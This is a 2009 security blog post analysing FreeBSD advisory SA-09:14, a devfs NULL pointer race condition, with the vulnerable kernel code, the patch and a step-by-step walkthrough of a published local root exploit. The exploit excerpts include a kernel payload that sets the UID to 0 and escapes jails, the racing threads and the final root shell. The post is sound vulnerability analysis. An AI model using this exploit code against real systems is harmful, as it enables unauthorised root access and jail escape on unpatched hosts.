xorl %eax, %eax

FreeBSD-SA-09:14: Devfs/VFS NULL Pointer Race Condition

with 4 comments

This is a recently disclosed vulnerability, discovered by Polish researcher Przemyslaw Frasunek. The issue affects FreeBSD 6.x as well as 7.x releases and it is located in the sys/fs/devfs/devfs_vnops.c which is a code written by the famous Poul-Henning Kamp and includes the VNOP functions for devfs filesystem. Here is the vulnerable code from 7.2 release of FreeBSD:

static int
devfs_fp_check(struct file *fp, struct cdev **devp, struct cdevsw **dswp)

         *dswp = devvn_refthread(fp->f_vnode, devp);
         if (*devp != fp->f_data) {
                 if (*dswp != NULL)
                 return (ENXIO);
         KASSERT((*devp)->si_refcount > 0,
             ("devfs: un-referenced struct cdev *(%s)", devtoname(*devp)));
         if (*dswp == NULL)
                 return (ENXIO);
         curthread->td_fpop = fp;
         return (0);

P. Frasunek noticed that in devfs_open() of the same file, ‘fp->f_vnode’ is not initialized and thus, remains with value of zero during the execution of the above code. This routine uses devvn_refthread() to initialize the ‘dswp’ pointer. Then, if ‘devp’ (which is the pointer to the requested device) isn’t NULL it will release the device thread using ‘dev_relthread()’ and return with ENXIO (aka. Device not configured), otherwise, it will assert() that ‘(*devp)->si_refcount’ (which contains the number of references to that structure) is greater than zero, and if ‘dswp’ is NULL, it will immediately return with ENXIO. In any other case, it will initialize ‘curthread->td_fpop’ with ‘fp’. curthread points to the FS:[0] (on IA-32) or GS:[0] (on x86_64) segment selector which has the currently executing thread’s structure (aka. struct thread), and ‘td_fpop’ as we can read from sys/proc.h contains the file referencing cdev under op.
Now, a closer look to dev_relthread() which is called in case of a non-NULL device pointer can be found at kern/kern_conf.c and does this:

dev_relthread(struct cdev *dev)
         mtx_assert(&devmtx, MA_NOTOWNED);
         KASSERT(dev->si_threadcount > 0,
            ("%s threadcount is wrong", dev->si_name));

Basically, it simply decrements the thread’s counter by one in a lock. The second routine that is being called in devfs_fp_check() is the devvn_refthread() which is used to initialize ‘dswp’ pointer. This is probably the most interesting one…

struct cdevsw *
devvn_refthread(struct vnode *vp, struct cdev **devp)
         struct cdevsw *csw;
         struct cdev_priv *cdp;
         mtx_assert(&devmtx, MA_NOTOWNED);
         csw = NULL;
         *devp = vp->v_rdev;
         if (*devp != NULL) {
                 cdp = (*devp)->si_priv;
                 if ((cdp->cdp_flags & CDP_SCHED_DTR) == 0) {
                         csw = (*devp)->si_devsw;
                         if (csw != NULL)
         return (csw);

It takes a vnode and a cdev structures as arguments, and after a simple assertion, it locks the device and sets the device pointer to ‘vp->v_rdev’. Since, ‘fp->f_vnode’ was not properly initialized in devfs_open() and it is directly used as the first argument of devvn_refthread(), this will result in a NULL pointer dereference and ‘devp’ will be pointing to NULL->v_rdev which as P. Frasunek discovered. Next, if ‘devp’ isn’t NULL (which is our case), it will initialize ‘cdp’ with ‘(*devp)->si_priv’, and check the CDP_SCHED_DTR and if set, initialize ‘csw’ to ‘(*devp)->si_devsw’. At last, if this is not NULL, it will increment ‘(*devp)->si_threadcount++’.
This final operation allows the modification of an arbitrary user controlled location but unfortunately, it is restored in its original value through the decrement that dev_relthread() does when called in devfs_fp_check(). Nevertheless, P. Frasunek managed to code a really awesome exploit code for that vulnerability. Before moving on with the analysis of his exploit code, here is how it was patched by the FreeBSD guys:

 		fp->f_data = dev;
+		fp->f_vnode = vp;

A simple initialization of ‘fp->f_vode’ in devfs_open() was enough.
Now, to the exploit code…

int main(void) {
	int i;
	pthread_t pth, pth2;
	struct cdev devp;
	char *p;
	unsigned long *ap;

	/* 0x1c used for vp->v_rdev dereference, when vp=0 */
	/* 0xa5610e8 used for vp->r_dev->si_priv dereference */
	/* 0x37e3e1c is junk dsw->d_kqfilter() in devfs_vnops.c:650 */

	unsigned long pages[] = { 0x0, 0xa561000, 0x37e3000 };
	unsigned long sizes[] = { 0xf000, 0x1000, 0x1000 }; 

His comments are really useful here. Those two arrays contain the pointers and their equivalent sizes which are described in detail in the comments. The following code is:

	for (i = 0; i < sizeof(pages) / sizeof(unsigned long); i++) {
		printf("[*] allocating %p @ %p\n", sizes[i], pages[i]);
		if (mmap((void *)pages[i], sizes[i], PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) {
			return -1;

This loop is used to allocate the appropriate addresses described earlier in the ‘pages[]’ and their equivalent ‘sizes[]’ arrays using mmap(2) system call. The next part of main() is…

#define JE_ADDRESS 0xc076c62b

/* location of "je" (0x74) opcode in devfs_fp_check() - it will be incremented
 * becoming "jne" (0x75), so error won't be returned in devfs_vnops.c:648
 * and junk function pointer will be called in devfs_vnops.c:650
 * you can obtain it using:
 * $ objdump -d /boot/kernel/kernel | grep -A 50 \<devfs_fp_check\>: | grep je | head -n 1 | cut -d: -f1


	*(unsigned long *)0x1c = (unsigned long)(JE_ADDRESS - ((char *)&devp.si_threadcount - (char *)&devp));

	p = (char *)pages[2];
	ap = (unsigned long *)p;

	for (i = 0; i < sizes[2] / 4; i++)
		*ap++ = (unsigned long)&kernel_code;

So, he’s using a JE instruction in devfs_fp_check() as its target for the increment/decrement race condition and ‘ap’ is initialized to point to ‘pages[2]’ which has the address of ‘dsw->d_kqfilter()’ routine. This is filled with the contents of kernel_code() which is this:

static void kernel_code(void) {
	struct thread *thread;
	gotroot = 1;
		"movl %%fs:0, %0"
		: "=r"(thread)
	thread->td_proc->p_ucred->cr_uid = 0;
	thread->td_proc->p_ucred->cr_prison = NULL;


It retrieves the current thread structure on IA-32 systems (on X86_64 he should be using %%gs:0), and sets the current thread’s UID to that of root (aka. 0) and the pointer to a possible jail that is being running for the current thread to NULL to escape from a jail environment.
Back to main() we have…

	if ((kq = kqueue()) < 0) {
		return -1;

	pthread_create(&pth, NULL, (void *)do_thread, NULL);
	pthread_create(&pth2, NULL, (void *)do_thread2, NULL);

	timeout.tv_sec = 0;
	timeout.tv_nsec = 1;

	printf("waiting for root...\n");
	i = 0;

	while (!gotroot && i++ < 10000)

He initializes ‘kq’ using kqueue() system call and he creates two threads that will execute do_thread() and do_thread2() respectively, then, he initializes a timespec structure and at last, doing a simple sleeping loop to wait for the threads to gain execution in the kernel context. Here is the code of do_thread():

void do_thread(void) {

	while (!gotroot) {
		memset(&kev, 0, sizeof(kev));
		EV_SET(&kev, fd, EVFILT_READ, EV_ADD, 0, 0, NULL);

		if (kevent(kq, &kev, 1, &ke, 1, &timeout) < 0)



As long as it has not gained root access, it will initialize a kevent structure using EV_SET() macro setting the changelist to fd with an EVFILT_READ event (which means that it will return when there are data available to read from fd) and EV_ADD to add the event to the kqueue. Finally, it will invoke kevent() on the previously set event.
Now, do_thread2() goes like this:

void do_thread2(void) {
	while(!gotroot) {
		/* any devfs node will work */
		if ((fd = open("/dev/null", O_RDONLY, 0600)) < 0)



While it has not gain root access, it will open a device in ‘fd’ file descriptor and then close it. At last, the final gone of main() routine is:


	if (getuid()) {
		printf("failed - system patched or not MP\n");
		return -1;

	execl("/bin/sh", "sh", NULL);

	return 0;

So, if it is able to set its UID to 0 it will spawn a shell which would be a root-shell. :)
The goal of this exploit code is to follow these steps:
1) place the JE instruction of devfs_fp_check() to the location that the increment will take place
2) Open a device to trigger the increment. This will make the JE (which is 0x74) to JNE (which is 0x75) and this results in the invocation of dsw->d_kqfilter() as we can see here:

static int
devfs_kqfilter_f(struct file *fp, struct knote *kn)
         struct cdev *dev;
         struct cdevsw *dsw;
         int error;
         struct file *fpop;
         struct thread *td;
         td = curthread;
         fpop = td->td_fpop;
         error = devfs_fp_check(fp, &dev, &dsw);
         if (error)
                return (error);
         error = dsw->d_kqfilter(dev, kn);
         td->td_fpop = fpop;
         return (error);

Where obviously, the JE is the if (error) check.

3) The kernel will jump to dsw->d_kqfilter() but this is where kernel_code() resides and leads to privilege escalation and possible jail escape.

By doing so, P. Frasunek avoids the dev_relthread() (the decrement) in devfs_kqfilter_f() as you can clearly see. The two threads are used to reach that race window of the increment/decrement using kevent() on the ‘fd’ and opening/closing the ‘fd’.

Written by xorl

October 13, 2009 at 23:17

4 Responses

Subscribe to comments with RSS.

  1. nice u r back ;)


    October 14, 2009 at 07:39

  2. nice to see new posts :)


    October 14, 2009 at 22:33

  3. nice to see you back


    October 15, 2009 at 11:43

  4. nice to see you, to see you, nice!


    October 21, 2009 at 16:48

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: